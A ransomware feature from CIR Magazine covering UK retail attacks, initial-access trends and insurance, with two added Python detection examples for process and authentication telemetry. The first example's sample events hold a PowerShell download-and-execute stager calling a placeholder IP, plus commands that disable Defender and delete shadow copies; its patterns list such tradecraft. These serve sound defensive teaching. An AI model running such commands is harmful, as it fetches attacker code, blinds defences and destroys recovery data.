RANSOMWARE

Ransomware incidents continue to rise, driven by compromised perimeter security and remote desktop products and, as a string of retailers will attest, no company is immune. Martin Allen-Smith investigates

A wave of cyber attacks swept through the UK retail sector in recent weeks, starting with Marks & Spencer, whose systems were crippled by ransomware, halting contactless payments and online orders. The Co-op Group quickly followed, shutting down parts of its IT network in response to a separate breach. Harrods also came under attack soon after, though it appears to have avoided the worst, with no ransom reported.

Ransomware remains one of the most persistent and financially damaging cyber threats facing organisations today. The financial impact of these incidents is becoming harder to ignore. Marks & Spencer’s ransomware breach, for example, is estimated to result in a £300 million hit to operating profits this year.

While the methods used by attackers continue to evolve, recent data shows that the primary points of entry often remain consistent – most notably exposed remote services, misconfigured infrastructure, and compromised user credentials. Rishi Baviskar, global head of cyber risk consulting at Allianz Commercial, says that in perimeter defences, the most common weak points are unsecured, unpatched or misconfigured network components that are exposed to the internet. RDP, VPN and firewall infrastructures are common targets due to known vulnerabilities.

“Ransomware actors continue to focus heavily on exploiting...human error and psychology,” he explains. “Social engineering and phishing – including smishing, instant messaging and malvertising – often lead to revealing users’ login credentials. The weak or stolen compromised credentials allow attackers to bypass perimeter security.”

The 2025 Sophos Active Adversary Report detailed attacker behaviour and techniques from over 400 managed detection and response and incident response cases, and found that in 56 per cent of cases in 2024 attackers gained initial access by exploiting external remote services (including edge devices such as firewalls and VPNs) in combination with valid accounts – essentially ‘logging in’ rather than ‘breaking in’.

The combination of external remote services and valid accounts aligns with the top root causes of attacks. For the second year in a row, the report found that compromised credentials were the number one root cause of attacks (41 per cent). This was followed by exploited vulnerabilities (22 per cent) and brute force attacks (21 per cent).

Katie Inns, head of attack surface management at S-RM, says recent years have seen threat actors move away from phishing as an initial access vector to instead exploit vulnerabilities in unpatched internet-facing systems. Almost 75 per cent of the incidents dealt with by the consultancy in 2024 involved initial access via the exploitation of a vulnerability in public-facing infrastructure or through a remote access solution without multi-factor authentication. “This is likely due to the speed and success rate that exploitation of these vulnerabilities can provide,” she explains. “Threat actors are actively searching for vulnerable VPN endpoints and other remote access solutions that can provide a direct route into an organisation’s internal network.

“These can also be solutions that were deployed in a rush during the pandemic, meaning security was considered as an afterthought – if even considered at all.”

Adaptive cyber security

To address these risks, organisations must reassess the resilience of their remote access infrastructure and legacy systems. As the volume of remote and hybrid working set-ups continues to rise, so, too, does the exposure to cyber risk.

Dr Jason Nurse, reader in cyber security at the University of Kent, says organisations need to keep better track of which devices have access to their networks, and manage the risk appropriately. “It’s surprising how many businesses still don’t have a clear idea of what remote devices can connect to their network,” he explains, adding that security frameworks and insurance assessments are having to work extra hard to keep pace with the threat and adapt to the rise in ransomware claims.

“Security frameworks are emphasising the importance of prioritising key security controls that can mitigate ransomware attacks and lessen the significance of the harm encountered,” Nurse says. “Insurance assessments are adopting a similar approach, though they are often informed more by the claims they have seen. We’ve even seen some insurers move ransomware coverage from basic cyber insurance policies to add-ons, to help manage risk exposure.”

Daniel Woods, principal security researcher at insurer Coalition, insists that insurers are stepping up their game in identifying vulnerabilities and in supporting insureds.

“Given that software vulnerabilities are the second most common IAV [initial access vector], it becomes critical to identify vulnerabilities that threat actors are exploiting. Unfortunately, common vulnerabilities and exposures surged to over 40,000 in 2024 – a 38 per cent increase from 2023 – providing threat actors with over 3,000 new vulnerabilities per month.

“Insurers need to use AI and expert judgment to identify the most risky vulnerabilities and proactively notify their customers,” Woods adds.

As the threat landscape evolves, insurers and organisations alike must balance risk mitigation with realistic expectations about how cyber hygiene can impact policy coverage and incident outcomes. Underwriting ransomware insurance policies is largely data-driven in its approach; however, enterprise ransomware is still a relatively nascent threat.

Timothy West, director of threat intelligence and outreach at WithSecure Intelligence, points to the double-edged sword of insuring these types of events. “We have noted an increasing proportion of ransomware victims are smaller organisations, based [on information] posted to data leak sites (where extortion has failed for example). Ransomware insurance can, of course, give victims the means to meet extortion demands, which prevents them from being counted in data leak site statistics.

“From this perspective there is an argument that ransomware insurance may actually fund, and fuel, ransomware actors... We also note that ransomware actors are certainly responsive to ransomware insurance; there is evidence that actors seek evidence of insurance and adjust their ransom demands in accordance with the policy.”

As well as managing their internal risks, businesses must now scrutinise their external dependencies, recognising that vulnerabilities may be inherited from partners and service providers. Allianz Commercial’s Baviskar says attackers are finding new ways to blend in and disable defences. “To make it harder to detect and remove malicious code...attackers are using fileless malware execution methods, running scripts and commands directly in memory to avoid disk-based detection.

“They also manipulate the legitimate, native operating system tools and trusted administrative software – a technique known as ‘living off the land’. Complex obfuscation on payloads, scripts and C2 comms includes multi-layered encryption, custom encoding schemes, and polymorphism. Other obscure functionalities include command-line arguments, API hooking evasion (blinding), tampering and disabling or removing the EDR directly. AI is also being used by attackers to create adaptive malware that dynamically alters its behaviour to improve its chances of evasion.”
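The evasion techniques Baviskar lists still leave traces in process-creation telemetry even when nothing new touches disk: the script block of an encoded PowerShell command can be decoded and inspected, a mail client spawning a shell is abnormal on its own, and the commands that disable Defender, stop an EDR service or delete shadow copies are short and recognisable. The following is an added example, not code from the article, from Allianz or from any EDR product. It triages constructed process-creation records for those patterns; the record field names, the sample events and the list of service names are this example's own assumptions.

```python
"""Triage process-creation events for living-off-the-land and EDR-tampering
patterns. Added example, not code from the article, Allianz or any EDR product.
The events below are constructed to resemble Windows process-creation telemetry
(Sysmon event 1 / Security 4688 style); the field names are this example's own."""
import base64
import re

# Native binaries routinely abused to run code without dropping a new executable.
LOLBINS = {"powershell.exe", "pwsh.exe", "rundll32.exe", "mshta.exe", "regsvr32.exe",
           "certutil.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe", "wmic.exe"}
OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# (finding label, command-line pattern). The service names are examples of real
# AV/EDR services (assumed here); extend the list to match what is deployed.
PATTERNS = [
    ("download cradle", re.compile(
        r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I)),
    ("in-memory execution", re.compile(
        r"\bIEX\b|Invoke-Expression|FromBase64String|Reflection\.Assembly", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("script-engine abuse", re.compile(
        r"mshta(?:\.exe)?\s+\S*(?:https?:|javascript:|vbscript:)"
        r"|rundll32(?:\.exe)?\s+\S*javascript:", re.I)),
    ("defender disabled", re.compile(r"Set-MpPreference\s+-Disable\w+", re.I)),
    ("security service stopped", re.compile(
        r"\b(?:sc|net)(?:\.exe)?\s+stop\s+(?:sense|windefend|csfalconservice|sentinelagent)\b",
        re.I)),
    ("shadow copies deleted", re.compile(
        r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic\s+shadowcopy\s+delete", re.I)),
]
# PowerShell's -EncodedCommand (and its abbreviations) takes base64 of UTF-16LE text.
ENCODED = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext script block of a -EncodedCommand argument, or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(ev):
    """Return the list of finding labels for one process-creation event."""
    image, parent = _basename(ev["image"]), _basename(ev["parent_image"])
    text = ev["command_line"]
    findings = []
    decoded = decode_encoded_command(text)
    if decoded is not None:
        findings.append("encoded command")
        text = f"{text}\n{decoded}"        # scan the decoded script block as well
    if parent in OFFICE and (image in LOLBINS or image == "cmd.exe"):
        findings.append("office app spawned shell")
    findings.extend(label for label, pat in PATTERNS if pat.search(text))
    return findings


def triage(events):
    """Map event id -> findings, keeping only events that fired at least one."""
    return {ev["id"]: f for ev in events if (f := triage_event(ev))}


# Constructed sample telemetry for the example (not real logs).
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\System32\svchost.exe", "image": PS,
     "command_line": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"id": 2, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": PS, "command_line": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"id": 3, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "command_line": "vssadmin.exe delete shadows /all /quiet"},
    {"id": 4, "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "command_line": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
]

if __name__ == "__main__":
    for event_id, findings in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(findings)}")
```

The scheduled backup script (event 1) produces no finding; the Outlook-spawned, hidden, encoded PowerShell (event 2) fires five, because the decoded script block is scanned alongside the raw command line. The point for a detection team is that none of these rules depends on a file hash or a signature of the payload, which is exactly what fileless and living-off-the-land tradecraft is designed to deny the defender.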

As threat actors grow increasingly adept at concealing their presence, defenders must take a more holistic, layered approach to cyber security that factors in threat intelligence, behavioural analytics, and resilient system design.

Against this backdrop, which technologies or practices show the most promise in reducing the ransomware threat? WithSecure Intelligence’s West says the best advice for most ‘typical’ organisations is simply to do the basics well.

“Organisations should employ proactive technologies and processes for awareness and reduction of threat surface – namely intelligence-led exposure management products and services, user education, and strong patching processes. Organisations should also employ effective reactive/response technologies to ensure that in the event of an intrusion they are well equipped to respond quickly and effectively. This will consist of the usual suspects, such as endpoint protection, EDR and effective and tested response processes.

“This is the foundation upon which further, more advanced and complex, technologies can be deployed – such as deception technologies, internal honeypots and canaries. These advanced tools show promise as effective countermeasures, particularly in cloud environments, however, they cannot be considered a ‘silver bullet’ and shouldn’t replace a robust and resilient defence in-depth approach.”

Defence in depth remains the guiding principle for managing cyber risk. And with attack windows shrinking and business operations becoming more digitised, the ability to detect and respond rapidly has never been more critical.

As John Shier, field CISO at Sophos, says: “While attacker dwell times are still measured in days, defenders must prioritise detection and response. After initial access, organisations only have three days before data gets stolen in ransomware, data extortion and data exfiltration attacks. In addition, 83 per cent of ransomware attacks also occur outside of local business hours, and only 2.7 hours before ransomware is launched. Without a strong understanding of what normal looks like, coupled with continuous proactive monitoring, many organisations are missing key signals that could prevent the worst outcomes.”
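Several threads of the article point at the same detection problem: compromised credentials and brute force as the top root causes, remote access without multi-factor authentication, not knowing which accounts and devices should be connecting, canary accounts as a cheap deception layer, and Shier's point that without a baseline of what normal looks like the out-of-hours signal is missed. The following is an added example, not code from the article or from Sophos, S-RM or WithSecure. It builds a per-user baseline from a week of constructed VPN/RDP authentication lines and then flags, on a later day, a success that follows a burst of failures, a login from a network the user has never used, an out-of-hours login that is also outside that user's own pattern, any touch of a decoy account, and a login by a user with no history at all. The log format, the business-hours window and the canary account name are this example's own assumptions.

```python
"""Baseline-and-alert over remote-access authentication logs. Added example, not
code from the article, Sophos, S-RM or WithSecure. Log lines are constructed in
a syslog-like shape this example assumes:
    <ISO-8601 local timestamp> <service> user=<name> src=<ip> result=<success|fail>"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from ipaddress import ip_network

LINE = re.compile(r"^(\S+) (\S+) user=(\S+) src=(\S+) result=(success|fail)$")
BUSINESS_HOURS = range(8, 19)             # 08:00-18:59 local (assumed)
CANARY_ACCOUNTS = {"svc_backup_old"}      # decoy account with no legitimate use (assumed)
FAIL_THRESHOLD, FAIL_WINDOW = 5, timedelta(minutes=10)

R_BURST = "success after burst of failures"
R_NEWNET = "new source network for user"
R_HOURS = "out-of-hours login outside user's baseline"
R_CANARY = "canary account used"
R_NOBASE = "login by user with no baseline"


def parse(lines):
    """Parse log lines into event dicts; lines that do not match are skipped."""
    events = []
    for ln in lines:
        m = LINE.match(ln.strip())
        if m:
            ts, service, user, src, result = m.groups()
            events.append({"ts": datetime.fromisoformat(ts), "service": service,
                           "user": user, "src": src, "result": result})
    return events


def src_net(ip):
    """Collapse a source address to its /24 so address churn does not look new."""
    return str(ip_network(f"{ip}/24", strict=False))


def build_baseline(history):
    """'What normal looks like': per user, hours and /24s of past successful logins."""
    base = defaultdict(lambda: {"hours": set(), "nets": set()})
    for e in history:
        if e["result"] == "success":
            base[e["user"]]["hours"].add(e["ts"].hour)
            base[e["user"]]["nets"].add(src_net(e["src"]))
    return dict(base)


def detect(events, baseline):
    """Return (timestamp, rule, user, src) alerts for the events, in log order."""
    alerts = []
    fails = defaultdict(deque)            # src ip -> timestamps of recent failures
    for e in events:
        stamp, user, src = e["ts"].isoformat(), e["user"], e["src"]
        if user in CANARY_ACCOUNTS:       # any touch of a decoy account is an alert
            alerts.append((stamp, R_CANARY, user, src))
        q = fails[src]
        while q and e["ts"] - q[0] > FAIL_WINDOW:
            q.popleft()
        if e["result"] == "fail":
            q.append(e["ts"])
            continue
        if len(q) >= FAIL_THRESHOLD:      # guessing that finally worked
            alerts.append((stamp, R_BURST, user, src))
        b = baseline.get(user)
        if b is None:
            alerts.append((stamp, R_NOBASE, user, src))
            continue
        if src_net(src) not in b["nets"]:
            alerts.append((stamp, R_NEWNET, user, src))
        if e["ts"].hour not in BUSINESS_HOURS and e["ts"].hour not in b["hours"]:
            alerts.append((stamp, R_HOURS, user, src))
    return alerts


# Constructed sample logs: a week of normal activity, then one day to inspect.
HISTORY_LINES = [
    line
    for day in range(5, 10)                                   # 2025-05-05 .. 05-09
    for line in (
        f"2025-05-{day:02d}T09:03:00 vpn user=alice src=198.51.100.7 result=success",
        f"2025-05-{day:02d}T13:30:00 vpn user=alice src=198.51.100.7 result=success",
        f"2025-05-{day:02d}T22:15:00 vpn user=jane src=203.0.113.4 result=success",
        f"2025-05-{day:02d}T01:40:00 vpn user=jane src=203.0.113.4 result=success",
    )
]
TODAY_LINES = [
    *(f"2025-05-12T02:0{i}:00 rdp user=alice src=192.0.2.66 result=fail" for i in range(1, 6)),
    "2025-05-12T02:06:00 rdp user=alice src=192.0.2.66 result=success",
    "2025-05-12T02:07:00 rdp user=svc_backup_old src=192.0.2.66 result=fail",
    "2025-05-12T09:12:00 vpn user=alice src=198.51.100.7 result=success",
    "2025-05-12T20:30:00 vpn user=bob src=203.0.113.200 result=success",
    "2025-05-12T22:40:00 vpn user=jane src=203.0.113.4 result=success",
]

if __name__ == "__main__":
    for alert in detect(parse(TODAY_LINES), build_baseline(parse(HISTORY_LINES))):
        print(*alert)
```

Jane's 22:40 login is not flagged even though it is outside business hours, because her own baseline shows night-shift logins; a flat "after 18:00" rule would page on her every evening and train the analyst to ignore it. Alice's 02:06 RDP success from an unfamiliar network after five failures in five minutes is the shape of the credential-led intrusion the Sophos and S-RM figures describe, and the failed attempt against the decoy account a minute later is the canary doing its job.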

This article was published in the Q2 2025 issue of CIR Magazine.